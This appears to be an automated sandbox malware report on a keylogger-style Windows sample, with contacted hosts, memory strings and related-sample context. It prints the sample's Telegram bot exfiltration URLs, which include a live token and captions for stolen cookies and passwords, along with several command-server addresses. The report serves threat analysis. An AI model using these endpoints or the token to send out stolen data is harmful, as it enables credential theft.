Name	IP	Active	Malicious	Reputation
drive.google.com	172.217.19.174	true	false	high
drive.usercontent.google.com	142.250.181.97	true	false	high
reallyfreegeoip.org	172.67.177.134	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.247.73	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651300320&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651300320&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:632922%0D%0ADate%20and%20Time:%2018/12/2024%20/%2013:54:58%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20632922%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/chrome_newtab	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023C0D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/e&	msiexec.exe, 00000006.00000002.3309207885.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp	false	high
https://www.office.com/P	msiexec.exe, 00000006.00000002.3326416598.0000000023C50000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/License	powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/lB	msiexec.exe, 00000006.00000002.3326416598.0000000023C5A000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	msiexec.exe, 00000006.00000002.3326416598.0000000023C2E000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:632922%0D%0ADate%20a	msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/pscore6lB	powershell.exe, 00000002.00000002.2652429472.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.google.com/	msiexec.exe, 00000006.00000002.3309207885.0000000000D4A000.00000004.00000020.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/	powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false	high
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	msiexec.exe, 00000006.00000002.3326416598.0000000023C29000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot6675043108:AAG0v6eQpiK2_ep_3f58hzP5driBZyvUyRM/sendDocument?chat_id=6651	msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2652429472.0000000004BE1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	msiexec.exe, 00000006.00000002.3326416598.0000000023ABC000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.office.com/	msiexec.exe, 00000006.00000002.3326416598.0000000023C5F000.00000004.00000800.00020000.00000000.sdmp	false	high
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false	high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false	high
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2655107195.0000000005C48000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high
https://drive.usercontent.google.com/	msiexec.exe, 00000006.00000003.2797383605.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309207885.0000000000DC1000.00000004.00000020.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org	msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://www.microsoft.	powershell.exe, 00000002.00000002.2662602628.0000000008370000.00000004.00000020.00020000.00000000.sdmp	false	high
http://nsis.sf.net/NSIS_ErrorError	ugpJX5h56S.exe, ugpJX5h56S.exe.2.dr	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?L	msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	msiexec.exe, 00000006.00000002.3326416598.0000000023A71000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000002.00000002.2652429472.0000000004D36000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023B2B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023AE6000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	msiexec.exe, 00000006.00000002.3326416598.0000000023B52000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023B2B000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023ABC000.00000004.00000800.00020000.00000000.sdmp	false	high
http://api.telegram.org	msiexec.exe, 00000006.00000002.3326416598.0000000023C0D000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3326416598.0000000023BEB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	msiexec.exe, 00000006.00000002.3327506616.0000000024A91000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
172.217.19.174	drive.google.com	United States	15169	GOOGLEUS	false
142.250.181.97	drive.usercontent.google.com	United States	15169	GOOGLEUS	false
172.67.177.134	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false
132.226.247.73	checkip.dyndns.com	United States	16989	UTMEMUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1576733
Start date and time:	2024-12-17 13:34:05 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	ugpJX5h56S.exe renamed because original name is a hash value
Original Sample Name:	cf28af37882fea56145883bee9a128cb31b51c07d449b49e3071499b5f6f70ea.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@6/16@5/5
EGA Information:	Successful, ratio: 33.3%
HCA Information:	Successful, ratio: 97% Number of executed functions: 158 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 172.202.163.200, 4.175.87.197
Excluded domains from analysis (whitelisted): ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target msiexec.exe, PID 6220 because it is empty
Execution Graph export aborted for target powershell.exe, PID 428 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateValueKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: ugpJX5h56S.exe

Simulations

Behavior and APIs

Time	Type	Description
07:35:01	API Interceptor	41x Sleep call for process: powershell.exe modified
07:36:15	API Interceptor	455x Sleep call for process: msiexec.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
149.154.167.220	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Order129845.exe	Get hash	malicious	AgentTesla	Browse
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse
172.67.177.134	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	REQUEST FOR QUOTATION 1307-RFQ.exe	Get hash	malicious	MassLogger RAT	Browse
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	file.exe	Get hash	malicious	Snake Keylogger	Browse
	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse
132.226.247.73	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	Hesap_Hareketleri_10122024_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Hesap_Hareketleri_09122024_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	E-dekont.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	10122024Hesap hareketleriniz.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
checkip.dyndns.com	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	158.101.44.242
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	193.122.130.0
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
api.telegram.org	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
reallyfreegeoip.org	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	104.21.67.152
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	188.114.97.3
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	pedido-035241.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse	149.154.167.220
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	69633f.msi	Get hash	malicious	Vidar	Browse	149.154.167.99
	Order129845.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	149.154.167.220
CLOUDFLARENETUS	itLDZwgFNE.exe	Get hash	malicious	Flesh Stealer	Browse	104.16.184.241
	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	104.21.67.152
	https://sos-at-vie-1.exo.io/ilbuck/sato/process/continue-after-check-vr2.html	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	104.17.25.14
	https://www.cadbury.com@nmlr.xyz/christmas-hamper	Get hash	malicious	Unknown	Browse	104.26.9.83
	Doc_23-03-27.js	Get hash	malicious	Unknown	Browse	104.21.32.1
	Doc_23-03-27.js	Get hash	malicious	Unknown	Browse	104.21.80.1
	c2.exe	Get hash	malicious	Xmrig	Browse	104.20.4.235
	23d5f89e-2c54-ee19-3778-06a4bec842b9.eml	Get hash	malicious	Unknown	Browse	104.18.65.57
	https://protect.checkpoint.com/v2/r01/___https://link.edgepilot.com/xdg~fiaa57dVgx2DluRTp19jF8WMmYfWl?z=myyux:ddjrfnq.ynintwjuqD.htrdhdjOBhER6ylHFZFTGu9JoBlVNMIw79G-bMOgKn5Sf55EkuFm_s/LOKQ2pPEoswuEsuU2A7WKVctU0F0LxRir4fJPhZrPOzTgvHZltxJFSX/jFwCJW7F4BtO0gjUt6gM8NiU9g~uEaD_oE2wiDMlq2GDu8zhwYySQbzr0kVZGcn8s4Dk7cEDvSl6XRkaXaP7a5RqmSqgUx7-yk6g8/s-FxFFU__PNlcuV___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmRkMGI4MjA2MTNmMjg1YzMyNTM2YjE2YzI0MjAzMGU1Ojc6MzQ1NjphZDU1ODAwMDRlN2FjYWY0Nzk3ODJmN2U3MjI1MmNkMTUyZWIyNWZlZjgyYTY4N2M3ZWVjN2E0NjVmZjU3M2E4Omg6VDpU	Get hash	malicious	Unknown	Browse	104.16.123.96
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig	Browse	172.67.129.27
UTMEMUS	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe	Get hash	malicious	VIP Keylogger	Browse	132.226.8.169
	CITAS_pif.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	conferma..exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Shipment 990847575203.pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.8.169
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	172.67.177.134
	Ls4O6Pmixd.exe	Get hash	malicious	Phemedrone Stealer	Browse	172.67.177.134
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	MV GOLDEN SCHULTE DETAILS.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	pre-stowage.PDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	HIROSHIMA STAR - VSL's_DETAILS.docx.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	172.67.177.134
	PURCHASE ORDER TRC-0909718-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	172.67.177.134
	Justificante pago-09453256434687.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
3b5074b1b5d032e5620f69f9f700ff0e	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	174 Power Global_Enrollment_.docx.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	mjjt5kTb4o.lnk	Get hash	malicious	Unknown	Browse	149.154.167.220
	122046760.bat	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	pkqLAMAv96.lnk	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	IIC0XbKFjS.lnk	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	873406390.bat	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	0J3fAc6cHO.lnk	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	uEhN67huiV.dll	Get hash	malicious	Unknown	Browse	149.154.167.220
	JkICQ13OOY.dll	Get hash	malicious	Unknown	Browse	149.154.167.220
37f463bf4616ecd445d4a1937da06e19	87h216Snb7.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	142.250.181.97 172.217.19.174
	dP5z8RpEyQ.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.97 172.217.19.174
	hpEAJnNwCB.exe	Get hash	malicious	LummaC	Browse	142.250.181.97 172.217.19.174
	Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174
	sEOELQpFOB.lnk	Get hash	malicious	RedLine	Browse	142.250.181.97 172.217.19.174
	ref095vq842r70_classement_atout_france.pdf.lnk.d.lnk	Get hash	malicious	RedLine, SectopRAT	Browse	142.250.181.97 172.217.19.174
	PAYMENT ADVICE TT07180016-24_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	142.250.181.97 172.217.19.174
	bxAoaISZJQ.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174
	ei0woJS3Dy.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174
	tz1WicW6sG.lnk	Get hash	malicious	Unknown	Browse	142.250.181.97 172.217.19.174

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	53158
Entropy (8bit):	5.062687652912555
Encrypted:	false
SSDEEP:	1536:N8Z+z30pPV3CNBQkj2Ph4iUx7aVKflJnqvPqdKgfSRIOdBlzStAHk4NKeCMiYoLs:iZ+z30pPV3CNBQkj2PqiU7aVKflJnqvF
MD5:	5D430F1344CE89737902AEC47C61C930
SHA1:	0B90F23535E8CDAC8EC1139183D5A8A269C2EFEB
SHA-256:	395099D9A062FA7A72B73D7B354BF411DA7CFD8D6ADAA9FDBC0DD7C282348DC7
SHA-512:	DFC18D47703A69D44643CFC0209B785A4393F4A4C84FAC5557D996BC2A3E4F410EA6D26C66EA7F765CEC491DD52C8454CB0F538D20D2EFF09DC89DDECC0A2AFE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.G.......%...I...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\SmbShare\SmbShare.psd1T.......gsmbo........gsmbm........Enable-SmbDelegation.... ...Remove-SmbMultichannelConstraint........gsmbd........gsmbb........gsmbc........gsmba........Set-SmbPathAcl........Grant-SmbShareAccess........Get-SmbBandWidthLimit........rsmbm........New-SmbGlobalMapping........rsmbc........rsmbb........Get-SmbGlobalMapping........Remove-SmbShare........rksmba........gsmbmc........rsmbs........Get-SmbConnection........nsmbscm........gsmbscm........rsmbt........Remove-SmbBandwidthLimit........Set-SmbServerConfiguration........cssmbo........udsmbmc........Remove-SMBComponent........ssmbsc........ssmbb........Get-SmbShareAccess........Get-SmbOpenFile........dsmbd........ssmbs........ssmbp........nsmbgm........ulsmba........Close-SmbOpenFile........Revoke-SmbShareAccess........nsmbt........rsmbscm........Disable-SmbDelegation........nsmbs........Block-SmbShareAccess........gsmbcn........Set-Sm

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jgude254.dap.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
